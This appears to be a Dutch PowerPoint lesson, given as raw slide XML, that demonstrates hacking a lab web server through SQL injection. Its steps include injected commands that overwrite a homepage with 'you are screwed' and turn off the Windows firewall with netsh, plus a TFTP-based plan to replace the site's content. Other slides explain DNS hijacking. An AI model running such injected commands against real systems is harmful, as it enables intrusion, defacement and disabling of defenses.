          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>manipuleren van een website</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Manipuleren van een website</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154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Uit inspectie van de OWS.txt (via http://10.0.0.25/ows.txt) file kun</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              je zien welke files er gebruikt worden. Pas er eentje aan.</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     "echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>screwed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      c:\xampp\htdocs\OranjeWS\homepage.html" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              Klik op login ........ wat denk je dat er gebeurd is?           </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659539" y="3429615"/>
            <a:ext cx="2845823" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Let op de spaties.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Tekstvak 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2817382" y="6018198"/>
            <a:ext cx="6496276" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>Refresh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> de pagina http://10.0.0.25/OranjeWS/homepage.html </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1778184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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hacks</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>testomgeving 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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Toegang verschaffen tot een machine</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>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894021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Voorbereiding:</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="0" dirty="0"/>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Toegang verschaffen tot een machine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2" name="Tekstvak 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2282179" y="2111855"/>
            <a:ext cx="7364240" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Op dit punt is duidelijk dat de webserver zwak is en via SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> manipuleerbaar. Om de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>KoningWS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> wat fraaier te </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>defacen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>, wordt gebruik gemaakt van een eigen TFTP server die al op de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> machine draait.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Originele </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>webelementen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> van de bestaande website kunnen dan vervangen worden door andere afkomstig van de hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: Op de server is nu een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>zgn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> TFTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> actief. Dat is niet gebruikelijk maar er zijn genoeg andere manieren om een machine over te nemen. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>Mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> TFTP is dit voor demo-doeleinden even het makkelijks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Het is trouwens mogelijk om de TFTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ook remote te installeren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9585438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5205045" y="1096894"/>
            <a:ext cx="6712299" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Toegang verschaffen</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Toegang verschaffen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154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 1</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>advfirewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allprofiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      state off" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>                         </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1886950" y="5097641"/>
            <a:ext cx="7538404" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Dit commando schakelt de remote firewall uit zodat er makkelijker commando's naar buiten kunnen worden gedaan die wat importeren.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2607773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0353" y="3208344"/>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web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947" y="2718642"/>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8"/>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rgbClr val="FF0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03329" y="4749786"/>
            <a:ext cx="4211573" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Er kunnen de volgende zaken gebeurd zijn:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>De DNS cache van je de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> is gehackt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>De DNS entries van een DNS server zijn gehackt (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ernstig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Het resultaat is dat een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> naar een verkeerde webserver wordt gestuurd</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="Afbeeldingsresultaat voor hacker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1010" y="5576620"/>
            <a:ext cx="909429" cy="909429"/>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Rechte verbindingslijn met pijl 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3649366" y="3708818"/>
            <a:ext cx="1839696" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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Rechte verbindingslijn met pijl 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5489062" y="3708818"/>
            <a:ext cx="2552" cy="1655662"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>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0" name="Rechte verbindingslijn met pijl 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237914" y="4046857"/>
            <a:ext cx="0" cy="1317623"/>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Rechte verbindingslijn met pijl 50"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3617304" y="4046857"/>
            <a:ext cx="1620611" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF000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3074" name="Picture 2" descr="Afbeeldingsresultaat voor black serv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7042" y="5483621"/>
            <a:ext cx="749144" cy="1095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relateerde afbeeldi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4782495" y="2378862"/>
            <a:ext cx="709119" cy="773093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Tekstvak 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4242164" y="1997846"/>
            <a:ext cx="1991500" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hacked DNS server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Tekstvak 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="162020" y="4284945"/>
            <a:ext cx="1991500" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hacked DNS cache</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechthoek 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7516167" y="2718642"/>
            <a:ext cx="3396343" cy="3943415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEECE1">
              <a:alpha val="5607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52" name="Tekstvak 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9682480" y="1817993"/>
            <a:ext cx="2312105" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Benadeelden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de individuele gebruiker.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
